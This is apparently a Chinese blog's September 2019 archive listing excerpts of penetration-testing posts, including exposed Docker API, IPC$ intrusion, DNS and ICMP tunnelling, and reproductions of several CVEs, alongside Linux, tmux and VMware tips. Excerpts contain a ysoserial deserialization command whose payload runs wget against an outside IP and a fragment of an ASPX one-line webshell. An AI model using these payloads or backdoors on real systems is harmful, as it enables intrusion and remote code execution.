09 2019 档案

Docker API暴露下的危机
摘要:0x01:简介 Docker 是一个开源的应用容器引擎,让开发者可以打包他们的应用以及依赖包到一个可移植的镜像中,然后发布到任何流行的 Linux或Windows 机器上,也可以实现虚拟化。容器是完全使用沙箱机制,相互之间不会有任何接口。 当您在系统上安装 docker 时,它将暴露位于端口2375 阅读全文
posted @ 2019-09-30 13:49 mrhonest 阅读(374) 评论(0) 推荐(0) 编辑
linux就该这么学--资料整理--持续更新
摘要:基础命令 服务管理 systemctl redhat7 启动服务 重启服务 停止服务 不重启服务下重新加载配置文件 查看服务状态 设置服务开机自动启 设置服务开机不启动 查看服务是否开机自启 查看各个界别下的服务的启动与禁用情况 常用命令 man whatis ` help apropos echo 阅读全文
posted @ 2019-09-29 22:52 mrhonest 阅读(556) 评论(0) 推荐(0) 编辑
终端复用工具 tmux 基本操作教程
摘要:简介 在 Linux 操作环境下,终端操作是发挥 Linux 强大命令功能的重要途径,但在本地主机操作中,针对不同任务开启不同的终端,在使用时进行频繁的终端切换在某些场合下是一种使人分心和疲惫的操作,而通过远程登录使用远端服务器的功能时, ssh 等远程登录服务提供的单一终端时常不能满足正常的使用需 阅读全文
posted @ 2019-09-29 22:50 mrhonest 阅读(366) 评论(0) 推荐(0) 编辑
screen 命令基本操作教程
摘要:原文:https://www.cnblogs.com/yhjoker/p/10690148.html 与 tmux 工具较为类似,sreen 命令同样提供在唯一个的命令行终端上进行多窗口切换和管理的基本功能( 关于 tmux 基本操作可参见笔者的博文 终端复用工具 tmux 基本操作教程 )。scr 阅读全文
posted @ 2019-09-29 22:49 mrhonest 阅读(4535) 评论(0) 推荐(0) 编辑
VMware虚拟机提示“以独占方式锁定此配置文件失败”!!!
摘要:VMware异常关闭后再次启动提示“以独占方式锁定此配置文件失败”!!! 前几日在使用VMware虚拟机的时候,虚拟机突然出现了卡顿,然后就把电脑关机了重启,结果再次打开虚拟机的时候提示异常“以独占方式锁定此配置文件失败”,且后台有异常进程严重占用CPU;查阅网上的多种说法,是之前虚拟机未被正常关机 阅读全文
posted @ 2019-09-28 12:15 mrhonest 阅读(1049) 评论(0) 推荐(0) 编辑
net view
摘要:net view + 显示正由指定的计算机共享的域、计算机或资源的列表。如果在没有参数的情况下使用,则 net view 显示当前域中的计算机列表。 + 查看局域网中正在运行的计算机 + 查看域中home工作组中的计算机 + 查看computername计算机的共享列表 阅读全文
posted @ 2019-09-27 16:07 mrhonest 阅读(742) 评论(0) 推荐(0) 编辑
IPC$渗透使用
摘要:来源:https://www.cnblogs.com/sstfy 简介 IPC$(Internet Process Connection)是共享"命名管道"的资源,它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远 阅读全文
posted @ 2019-09-26 22:30 mrhonest 阅读(454) 评论(0) 推荐(0) 编辑
ipc$详细解释大全
摘要:原文:https://www.cnblogs.com/eagletian/articles/79024.html 一 前言 二 什么是ipc$ 三 什么是空会话 四 空会话可以做什么 五 ipc$连接所使用的端口 六 ipc$连接在hack攻击中的意义 七 ipc$连接失败的常见原因 八 复制文件失 阅读全文
posted @ 2019-09-26 17:26 mrhonest 阅读(2666) 评论(0) 推荐(0) 编辑
DNS隧道--dnscat2
摘要:安装 服务端 客户端 服务端和客户端均有编译好的 运行 直连 服务端 客户端 DNS 服务端 客户端 阅读全文
posted @ 2019-09-25 10:06 mrhonest 阅读(1103) 评论(0) 推荐(0) 编辑
kerberos认证原理
摘要:原文:https://blog.csdn.net/wulantian/article/details/42418231 一、 基本原理 Authentication解决的是“如何证明某个人确确实实就是他或她所声称的那个人”的问题。对于如何进行Authentication,我们采用这样的方法:如果一个 阅读全文
posted @ 2019-09-24 22:52 mrhonest 阅读(296) 评论(0) 推荐(0) 编辑
各厂商防火墙登录IP、初始密码(技术支持)
该文被密码保护。
posted @ 2019-09-24 20:51 mrhonest 阅读(3) 评论(0) 推荐(0) 编辑
icmp隧道--icmpsh
摘要:本地:ubantu 目标主机:windows 在ubantu上关闭自带的icmp回应 ubantu上启动 pip install impacket python icmpsh_m.py ubantuIP WindowsIP windows上 详细命令 阅读全文
posted @ 2019-09-24 14:56 mrhonest 阅读(582) 评论(0) 推荐(0) 编辑
泛微e-cology OA Beanshell组件远程代码执行漏洞复现CNNVD-201909-1041
摘要:靶机 影响版本 泛微e cology 阅读全文
posted @ 2019-09-23 21:49 mrhonest 阅读(1073) 评论(0) 推荐(0) 编辑
Harbor任意管理员注册漏洞复现CVE-2019-16097
摘要:注册时抓包 添加poc 管理员权限 POC 阅读全文
posted @ 2019-09-21 10:24 mrhonest 阅读(2504) 评论(0) 推荐(0) 编辑
ashx后门[转]
摘要:https://www.cnblogs.com/Fluorescence tjy/p/9855828.html 一、标准ASPX一句话木马 .NET平台下的一句话木马则百年不变,最常见的当属下面这句 <%@ Page Language=”Jscript”% <%eval(Request.Item[“ 阅读全文
posted @ 2019-09-19 09:25 mrhonest 阅读(608) 评论(0) 推荐(0) 编辑
CVE-2017-3248简单复现
摘要:我是这样操作的 目标跟windows在一个段,linux是另一个段的,我的虚拟机 windows主机上 `java cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections5 "wget http://11.205 阅读全文
posted @ 2019-09-17 15:14 mrhonest 阅读(1476) 评论(0) 推荐(1) 编辑
一个文件下载
摘要:起因 一次授权的渗透测试 两个文件下载页面 这个很简单了,修改D:\xxx\xxx\xxx\upload\xxx.docx 即可用dama1.jsp文件名下载下来 正戏 有个上传的地方 是这样的 正常抓取的数据包我没有保存 总之就是把上传成功的文件名改为../../../../../这种 然后在下载 阅读全文
posted @ 2019-09-12 17:02 mrhonest 阅读(241) 评论(0) 推荐(0) 编辑
CVE-2019-0708简单复现
摘要:各文件对应位置 windows7 配置参数 建立session 获得交互式shell windows2008 R2 64x 蓝屏 阅读全文
posted @ 2019-09-09 10:57 mrhonest 阅读(362) 评论(0) 推荐(0) 编辑
Runas命令:能让域用户/普通User用户以管理员身份运行指定程序
摘要:在win2k中,开始→程序→附件 ,找到计算器,按住shift键,点右键,选择“运行方式 ...”,这时候,会弹出对话框,询问你要使用哪个用户身份来运行该程序 。 不知道大家是否使用过win2k的这个功能,如果大家是使用win2k的英文版本的话,在按住shift后选择的就不是“运行方式 ...”而是 阅读全文
posted @ 2019-09-02 13:11 mrhonest 阅读(18707) 评论(1) 推荐(2) 编辑

点击右上角即可分享
微信分享提示